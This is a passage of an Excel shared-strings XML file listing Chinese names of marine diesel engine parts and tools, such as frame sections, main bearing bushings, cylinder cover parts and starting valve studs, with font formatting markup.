    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架底部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水喷管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集泥器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导流筒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工单元导板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工单元导向螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工支架操纵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸曲柄箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非加工气缸曲柄箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量草图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水报警气缸套螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水报警气缸套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架顶部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架底部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力垫圈环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全螺栓粘合</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>Penn</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮机架下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部防护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架防护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖上端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动器盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>降噪和降温的装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>降噪和降温盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套边缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体修理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>珩磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函孔盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部零件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡热板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形环衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心螺钉用螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀座砂轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀座砂轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗阀座拆卸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗阀座安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压环冲击板手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖提升外部螺柱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固环</t>
    </r>
